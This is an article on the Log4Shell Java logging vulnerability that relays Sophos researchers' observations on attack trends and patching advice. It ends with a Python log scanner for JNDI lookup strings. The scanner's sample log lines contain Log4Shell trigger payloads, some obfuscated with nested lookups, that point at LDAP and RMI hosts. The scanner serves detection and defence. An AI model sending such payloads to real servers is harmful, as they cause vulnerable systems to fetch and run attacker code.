About a week ago, there was news of a zero-day Log4Shell Java vulnerability, now formally denoted CVE-2021-44228. It involves sending a request to a vulnerable server that includes some attacker-supplied data, for example an HTTP header, with the expectation that the server will write that data to its logfile.
According to Sophos, the primary cause of Log4Shell (or CVE-2021-44228, as noted above) is what is called improper input validation. This means that you place too much trust in untrusted data that arrives from outsiders, and open up your software to sneaky tricks based on booby-trapped data.
Because of this, Log4Shell, a zero-day vulnerability in Apache Log4j (a popular Java logging library), poses a significant threat, as it can be exploited for unauthenticated remote code execution. Remote code execution (RCE) allows a bad actor to run code of their choosing on a server. If not handled promptly and properly, hundreds of millions of machines will remain vulnerable. The potential impact is huge.
In order to ensure that clients and the general public are made aware of, and stay protected from, the potential impacts of the Log4Shell Java vulnerability, Sophos has provided new threat intelligence on how cyberattackers are already exploiting or attempting to exploit unpatched systems.
Already detailed in the SophosLabs Uncut article, Log4Shell Hell: Anatomy of an Exploit Outbreak (authored by Sean Gallagher, a senior threat researcher at Sophos), other highlights from the intelligence include:
- Sophos is seeing a rapid uptick in attacks exploiting or attempting to exploit this vulnerability, with hundreds of thousands of attempts detected so far
- Cryptomining botnets are among the earliest “attack” adopters; botnets focus on Linux server platforms, which are particularly exposed to this vulnerability
- Sophos has also seen attempts to extract information from services, including Amazon Web Services keys and other private data
- Sophos observed that attempts to exploit network services start by probing for different service types. Around 90 percent of the probes Sophos detected were focused on the Lightweight Directory Access Protocol (LDAP). A smaller number of probes targeted Java's Remote Method Invocation (RMI), but Sophos researchers noted that there seems to be a larger variety of unique RMI-related attempts
- Sophos expects adversaries to intensify and diversify their attack methods and motivations in the coming days and weeks, including the possibility of leveraging it for ransomware
According to Sean Gallagher, the senior threat researcher at Sophos who wrote the SophosLabs Uncut article: “Since December 9, Sophos has detected hundreds of thousands of attempts to remotely execute code using the Log4Shell vulnerability. Initially, these were Proof-of-Concept (PoC) exploit tests by security researchers and potential attackers, among others, as well as many online scans for the vulnerability. This was quickly followed by attempts to install coin miners, including the Kinsing miner botnet. The most recent intelligence suggests attackers are trying to exploit the vulnerability to expose the keys used by Amazon Web Service accounts. There are also signs of attackers trying to exploit the vulnerability to install remote access tools in victim networks, possibly Cobalt Strike, a key tool in many ransomware attacks.
“The Log4Shell vulnerability presents a different kind of challenge for defenders. Many software vulnerabilities are limited to a specific product or platform, such as the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange. Once defenders know what software is vulnerable, they can check for and patch it. However, Log4Shell is a library that is used by many products. It can therefore be present in the darkest corners of an organization’s infrastructure, for example any software developed in-house. Finding all systems that are vulnerable because of Log4Shell should be a priority for IT security.
“Sophos expects the speed with which attackers are harnessing and using the vulnerability will only intensify and diversify over the coming days and weeks. Once an attacker has secured access to a network, then any infection can follow. Therefore, alongside the software update already released by Apache in Log4j 2.15.0, IT security teams need to do a thorough review of activity on the network to spot and remove any traces of intruders, even if it just looks like nuisance commodity malware.”
Gallagher further urged users to stay vigilant and not drop their guard as far as the Log4Shell vulnerability is concerned:
“With the exception of cryptomining, there is a lull before the storm in terms of more nefarious activity from the Log4Shell vulnerability. We expect adversaries are likely grabbing as much access to whatever they can get right now with the view to monetize and/or capitalize on it later on. The most immediate priority for defenders is to reduce exposure by patching and mitigating all corners of their infrastructure and investigate exposed and potentially compromised systems. This vulnerability can be everywhere,” he cautioned.
Where systems have been identified as vulnerable, he advised that defenders should run an incident response process and monitor for signs of remote access trojans such as C2 call-backs. “Secrets stored on exposed systems should also be rotated, particularly if they are exposed in environment variables. Lastly, consider critical third-party vendors who may also be at risk,” he added.
Paul Ducklin, the principal research scientist at Sophos, adds that various technologies are already at work to help bring the global vulnerability under control.
Ducklin stated: “Technologies including IPS, WAF and intelligent network filtering are all helping to bring this global vulnerability under control. But the staggering number of different ways that the Log4Shell ‘trigger text’ can be encoded, the huge number of different places in your network traffic that these strings can appear, and the wide variety of servers and services that could be affected are collectively conspiring against all of us. The very best response is perfectly clear: patch or mitigate your own systems right now. Our article provides practical advice that explains how the vulnerability works, why it works, what it can do, and how to fix it.”
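As an added illustration of the two defender-side points made above (the logged-header mechanism described at the top, and Ducklin's warning that the trigger text can be encoded in many ways), the following Python script is the editor's own example, not Sophos code or part of their article. It scans constructed web-server log lines for the JNDI lookup string, first flattening two common nested-lookup disguises so that a plain substring check is not fooled, and then breaks the hits down by scheme (LDAP versus RMI) the way the probe statistics above do. The log lines, IP addresses and paths are constructed sample data.

```python
import re
from collections import Counter

# Constructed sample log lines (not taken from the Sophos article). Line 1 is benign;
# the others carry a JNDI lookup in a logged header field, two of them disguised with
# nested lookups (${lower:...} and the ${...:-default} form).
SAMPLE_LOG = """\
10.0.0.5 - - "GET /index.html" 200 "Mozilla/5.0"
10.0.0.9 - - "GET /login" 200 "${jndi:ldap://203.0.113.10:1389/a}"
10.0.0.9 - - "GET /api" 500 "${${lower:j}ndi:${lower:l}dap://203.0.113.10/x}"
10.0.0.7 - - "GET /" 200 "${jndi:rmi://198.51.100.4:1099/obj}"
10.0.0.7 - - "GET /" 200 "${${::-j}${::-n}di:ldap://198.51.100.4/y}"
"""

# Innermost lookups only (no braces inside), so nesting is peeled one layer per pass.
_LOWER = re.compile(r"\$\{lower:([^{}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^{}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")   # ${prefix:key:-default} -> default
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def normalize(text: str) -> str:
    """Flatten nested Log4j-style lookups until the text stops changing."""
    prev = None
    while prev != text:
        prev = text
        text = _LOWER.sub(lambda m: m.group(1).lower(), text)
        text = _UPPER.sub(lambda m: m.group(1).upper(), text)
        text = _DEFAULT.sub(lambda m: m.group(1), text)
    return text


def scan(log_text: str) -> list:
    """Return (line number, JNDI scheme) for every line carrying a lookup trigger."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append((lineno, m.group(1).lower()))
    return hits


def scheme_breakdown(hits: list) -> Counter:
    """Count hits per scheme, e.g. to see how probes split between LDAP and RMI."""
    return Counter(scheme for _, scheme in hits)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    print(found, dict(scheme_breakdown(found)))
```

Run over real access logs, the hit list gives the systems to feed into the incident response process Gallagher describes; a hit means the trigger reached the logger, not necessarily that the lookup succeeded, so patch status and outbound LDAP/RMI connections from that host still need to be checked.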